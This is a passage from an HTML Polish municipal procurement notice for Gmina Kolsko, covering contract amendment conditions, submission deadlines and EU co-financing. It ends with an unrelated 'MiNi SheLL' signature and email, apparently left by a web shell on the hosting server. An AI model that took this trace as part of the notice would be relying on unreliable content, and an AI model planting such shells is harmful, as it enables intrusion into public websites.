kierownika robót, za uprzednią zgodą Zamawiającego, akceptującą kandydata na stanowisko, - zmiany podwykonawców w zakresie określonym w ofercie lub wprowadzenie nowych z zastrzeżeniem, iż nie mogą oni realizować części zamówienia przewidzianej do wyłącznej kompetencji Wykonawcy (o ile takie zastrzeżenie zostało dokonane przez Zamawiającego w SIWZ), - zmiana podyktowana koniecznością wykonania robót zamiennych, niewykraczających poza zakres przedmiotu zamówienia lub rezygnacji z części robót jeżeli będzie to niezbędne dla prawidłowej realizacji przedmiotu umowy i uzyskania założonego efektu rzeczowego, -zmiana podyktowana koniecznością wykonania robót wynikających z zaleceń organów uprawnionych np. nadzoru budowlanego, PIP itp. - zmiany w finansowaniu robót w poszczególnych okresach związane ze zmianą budżetu, otrzymaną dotacją, pożyczką lub innymi środkami z zewnątrz, - zmiana przepisów, które skutkują zmianą pozwolenia na budowę wydanego dla realizowanego przedsięwzięcia, - zmiana wynikająca ze zmiany danych podmiotowych Wykonawcy. Warunki zmian: a) inicjowanie zmian - na wniosek wykonawcy lub zamawiającego, b) zgoda obu stron umowy, c) uzasadnienie zmian - prawidłowa realizacja przedmiotu umowy, obniżenie kosztów, zapewnienie optymalnych parametrów technicznych i jakościowych robót i prac,
d) forma zmian: aneks do umowy w formie pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.kolsko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kolsko, ul. Piastowska 12, 67-415 Kolsko, pokój nr 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.04.2013 godzina 09:00, miejsce: Urząd Gminy Kolsko, ul. Piastowska 12, 67-415 Kolsko, pokój nr 10. Otwarcie ofert nastąpi w dniu 04.04.2013 o godzinie 09:05 w siedzibie Zamawiającego, pokój nr 1 (sala posiedzeń).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską  w ramach Programu Rozwoju Obszarów Wiejskich Odnowa i Rozwój Wsi.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com